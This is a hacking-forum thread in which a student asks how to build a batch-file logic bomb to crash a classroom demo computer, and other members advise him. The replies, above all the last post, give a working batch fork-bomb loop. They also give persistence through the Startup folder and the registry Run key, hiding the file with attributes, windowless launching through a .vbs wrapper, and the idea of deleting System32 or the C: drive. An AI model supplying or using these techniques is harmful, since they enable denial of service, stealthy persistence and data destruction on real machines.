Let's talk Logic Bombs

The constant threat: viruses, trojans, spyware, ... the list goes on

Let's talk Logic Bombs

Post by TheKrimlin on Thu Nov 28, 2013 4:12 am
([msg=78330]see Let's talk Logic Bombs[/msg])

Just a little background on me, I've been into computers for many years tinkering and toying around with them as a kid, got more serious with them getting into gaming and modding games, started programming (python, C++, etc). I've worked as a network admin, and now I'm stuck back in college so I can score a degree and get a good paying job making bank.

Now to the point, I have basic knowledge and usage of windows batch files for basic admin stuff to make my job easy. My instructor in my intro to info sec class told us that batch files don't have the flexibility of other scripts when it comes to viruses, furthermore said that batch files can never be logic bombs.

My mission is to create a kickass virus in batch file format and drop it on our demo computer to get my point across. Now I've got 2 weeks to do this and I want to get it done so I can shoot for honors credit for the course.

My idea is to write a batch file that takes data like log files (or some other kind of computer generated reports that build up rather quick) store these in a place to overload the ram causing a crash. The kicker is I want it to also take the crash dump files and store them back on ram after recovery to keep the process in a constant crash loop.

My questions are:
Is this even possible?
What kinda delivery methods are available for batch files?
How to get them in there stealthy and where to store them?
How to make a batch file auto exec at a certain point?

Computer is a old Dell Optiplex 755 on Windows XP
TheKrimlin
New User
New User
 
Posts: 8
Joined: Thu Nov 28, 2013 2:08 am
Blog: View Blog (0)


Re: Let's talk Logic Bombs

Post by centip3de on Thu Nov 28, 2013 5:52 pm
([msg=78332]see Re: Let's talk Logic Bombs[/msg])

TheKrimlin wrote:Now to the point, I have basic knowledge and usage of windows batch files for basic admin stuff to make my job easy.


Wait, so, you guys don't use Linux? That's odd. Most servers run Linux and beyond that, most information security classes use Linux. Although I suppose it's possible to use Windows for both, it's just fairly rare.

TheKrimlin wrote:My instructor in my intro to info sec class told us that batch files don't have the flexibility of other scripts when it comes to viruses


Eh? Batch is a pretty shitty language, it's just odd to hear them compared in terms of virii making.

TheKrimlin wrote:furthermore ... that batch files can never be logic bombs.


Once again, eh? If you're defining a logic bomb by the Wikipedia definition, then your professor would be right, unless of course your making software out in Batch (then you'd have to define what 'software' is, and it gets all kinds of meta).

TheKrimlin wrote:My mission is to create a kickass virus in batch file format and drop it on our demo computer to get my point across. Now I've got 2 weeks to do this and I want to get it done so I can shoot for honors credit for the course.


Something tells me that you won't be getting more credit for destroying a computer...

TheKrimlin wrote:My idea is to write a batch file that takes data like log files (or some other kind of computer generated reports that build up rather quick) store these in a place to overload the ram causing a crash. The kicker is I want it to also take the crash dump files and store them back on ram after recovery to keep the process in a constant crash loop.


Uh, why not just write a fork bomb that puts itself in the startup folder? Seems much simpler. If you still want to keep the fork bomb aspect of it (i.e. it goes off when someone launches a program/deletes a file, etc.), then why not just monitor a certain file and then launch the fork bomb if it changes?

TheKrimlin wrote:My questions are:
Is this even possible?


Well seeing as batch is turing complete, technically anything is possible... but practically, yes, it should be.

TheKrimlin wrote:What kinda delivery methods are available for batch files?


What kind of delivery methods are available? Do you mean, how to get a batch file onto a system? In theory, it's the same way you'd get any other virii onto a persons computer, with the added benefit that an AV most likely won't pick you up.

TheKrimlin wrote:How to get them in there stealthy and where to store them?


If you have physical access, why not just a USB? As to where to store them, you could always just make a massive folder tree, or just store it in a usually inconspicuous place like in the files for a random program.

TheKrimlin wrote:How to make a batch file auto exec at a certain point?


Depends on what you want to do. If you just want to check for changes in/on something, you can setup a simple conditional in the batch file and then put it in the task scheduler to run every 30 seconds or so.
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1412
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)


Re: Let's talk Logic Bombs

Post by Goatboy on Thu Nov 28, 2013 8:37 pm
([msg=78333]see Re: Let's talk Logic Bombs[/msg])

In addition to what centip3de said (99% of which I agree with), it seems like you're biting off more than you can chew. You've got some misused terminology going on and I think the cause of that is some serious misunderstanding. RAM doesn't really get expended by having a lot of files on the disk; you'd have to open them all at once and that's about as inelegant as it gets. You are also not only not going to get points for this, but if your school is like many of the others you will get in trouble. Even if it is a demo computer.

My suggestion? Read some papers about actual virii in C and ASM. Batch is simply not the tool for the job here.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2782
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: Let's talk Logic Bombs

Post by TheKrimlin on Thu Nov 28, 2013 11:36 pm
([msg=78339]see Re: Let's talk Logic Bombs[/msg])

centip3de wrote:Wait, so, you guys don't use Linux? That's odd. Most servers run Linux and beyond that, most information security classes use Linux. Although I suppose it's possible to use Windows for both, it's just fairly rare.

At my former workplace it was the fantastic Windows Server 2008 R2... I was super excited to have that there /sarcasm...
centip3de wrote:Eh? Batch is a pretty shitty language, it's just odd to hear them compared in terms of virii making.

I asked the question, I have an odd fascination with batch dunno why, but it's like a foot fetish, no one likes feet but there always that one guy lol
centip3de wrote:Once again, eh? If you're defining a logic bomb by the Wikipedia definition, then your professor would be right, unless of course your making software out in Batch (then you'd have to define what 'software' is, and it gets all kinds of meta).

That sound like an over complication that I'd rather not dive into because I don't have the time, thanks for clearing that up!
centip3de wrote:Something tells me that you won't be getting more credit for destroying a computer...

We have a computer in the class room that is dedicated for this purposeve already confirmed that if I do it I'd get that cute little "H" next to the course GPA. I'm also working in the IT department at the college part time, so whenever this computer get bombed we ghost in and re-image it
centip3de wrote:Uh, why not just write a fork bomb that puts itself in the startup folder? Seems much simpler. If you still want to keep the fork bomb aspect of it (i.e. it goes off when someone launches a program/deletes a file, etc.), then why not just monitor a certain file and then launch the fork bomb if it changes?

I like that idea, since this is fresh on my mind I never considered a fork bomb, I'll throw you in a creditor for the idea lol "that guy centip3de from HTS"
centip3de wrote:Well seeing as batch is turing complete, technically anything is possible... but practically, yes, it should be.

Fantastic
centip3de wrote:What kind of delivery methods are available? Do you mean, how to get a batch file onto a system? In theory, it's the same way you'd get any other virii onto a persons computer, with the added benefit that an AV most likely won't pick you up.

I'm not "virii" savvy, I know the functions and how they are delivered, but do not know the inner workings, which I'm trying to learn.
centip3de wrote:If you have physical access, why not just a USB? As to where to store them, you could always just make a massive folder tree, or just store it in a usually inconspicuous place like in the files for a random program.

I do have physical access but I wanted to be semi creative. In our class room we have a local network where all the computers are connected (minus the instructor's lol), but USB would be one way, that would still require logging into the computer, While I do have BT5 and HBCD on USB I was thinking of doing something over the network.
centip3de wrote:Depends on what you want to do. If you just want to check for changes in/on something, you can setup a simple conditional in the batch file and then put it in the task scheduler to run every 30 seconds or so.

I was thinking the same but didn't know if there was something I was missing.

Goatboy wrote:In addition to what centip3de said (99% of which I agree with), it seems like you're biting off more than you can chew. You've got some misused terminology going on and I think the cause of that is some serious misunderstanding. RAM doesn't really get expended by having a lot of files on the disk; you'd have to open them all at once and that's about as inelegant as it gets. You are also not only not going to get points for this, but if your school is like many of the others you will get in trouble. Even if it is a demo computer.<br><br>My suggestion? Read some papers about actual virii in C and ASM. Batch is simply not the tool for the job here.

Misused terms, I would probably agree, my teaching has been passed down information from people and manuals, which is why I'm in school lol.

I guess I should expound more on this "demo computer". It's a computer we have in the classroom that's there for the sole purpose for demonstrating the effects of virii and other security threats also to show what it looks like when someone has "illegally" gained access and shows us to look for (log files, traffic, etc), also students to pen test on and infect. This is no virii writing class but it is an intro to information security class.



Much appreciated guys!
TheKrimlin
New User
New User
 
Posts: 8
Joined: Thu Nov 28, 2013 2:08 am
Blog: View Blog (0)


Re: Let's talk Logic Bombs

Post by Goatboy on Fri Nov 29, 2013 2:22 am
([msg=78340]see Re: Let's talk Logic Bombs[/msg])

I like this guy. He gets the Goat Seal of Approval. Welcome him with open ports arms.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2782
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: Let's talk Logic Bombs

Post by TheKrimlin on Fri Nov 29, 2013 2:56 am
([msg=78342]see Re: Let's talk Logic Bombs[/msg])

I'm down for ummm open ports :twisted: females only though :mrgreen:

Glad to make a good first impression, I like this site, lots of good info, good people too (with the typical doucebaggery thrown in for spice) but nonetheless good!

I'm sure you'll be hearing more outlandish ideas form me in the future, when my teachers in elementary school told me think outside the box I took it too far (i.e. wanting to write a logic bomb in batch lol)
TheKrimlin
New User
New User
 
Posts: 8
Joined: Thu Nov 28, 2013 2:08 am
Blog: View Blog (0)


Re: Let's talk Logic Bombs

Post by WallShadow on Fri Nov 29, 2013 3:12 pm
([msg=78347]see Re: Let's talk Logic Bombs[/msg])

back in high school i wasted every boring lecture i could on toying around with batch stuff, and especially various malicious usages of those.

Here's a few tips on how to go about a batch logic bomb;

as cent stated, fork bomb really is the simplest method with something like this; (assuming the batch file is called 'mystupidbatchfile.bat')
Code: Select all
:start
cmd /k mystupidbatchfile.bat
goto start

that will kill the system by simply overusing resources but everything will be back to normal

although a truely destructive batch file would need to do something like deleting System32 or better yet, the entire C:/ drive.

also as stated previously, you might want to have it auto start on boot by placing the script (or a perliminary launching script) into the Startup folder (note there are serveral, not just 1) or use reg to add the batch to the run path.

if you add a method of automatic start up, you may also want to make the batch file invisible with ATTRIB +HS mystupidbatchfile.bat

timing stuff is pretty easy with the use of DATE and TIME and some careful variables.

another thing that you may want to do is to hide the window that pops up when a batch script is running. this can be done with any specially built program that could launch it, but i find it simpler to use visual basic by building a simple .vbs file which launches the batch file, and then running the .vbs file via vscript (or it may be wscript, i forget). this will make it so that the batch file is launched without a command window which the user could kill.

but note that batch is a TERRIBLE language for anything even slightly complicated, so if you're going to be spending any more than an hour developing this stuff, i recommend switching to some other language like C.

if there is anything else you wanna know, just ask. <3
User avatar
WallShadow
Contributor
Contributor
 
Posts: 594
Joined: Tue Mar 06, 2012 9:37 pm
Blog: View Blog (0)



Return to Malware

Who is online

Users browsing this forum: No registered users and 0 guests